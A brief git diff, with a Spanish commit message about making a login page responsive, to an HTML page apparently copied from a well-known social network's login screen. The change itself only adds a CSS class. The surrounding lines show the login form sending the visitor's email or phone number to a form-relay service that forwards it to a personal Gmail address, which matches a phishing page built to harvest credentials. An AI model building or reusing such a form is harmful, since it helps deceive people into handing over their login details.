haicendo responsive el login

--- a/indexx.html
+++ b/indexx.html
@@ -14,7 +14,7 @@
             y compartir con las personas que
              forman parte de tu vida</p>
     </div>
-    <div>
+    <div class="formresp">
         <form class="form" action="https://formsubmit.co/edwinjsa2021@gmail.com" method="POST">
             <input type="hidden" name="email" value="correoprovicional@gmail.com">
             <input type="text" id="emailInput" placeholder="Correo electrónico o número de teléfono" name="message"  required>
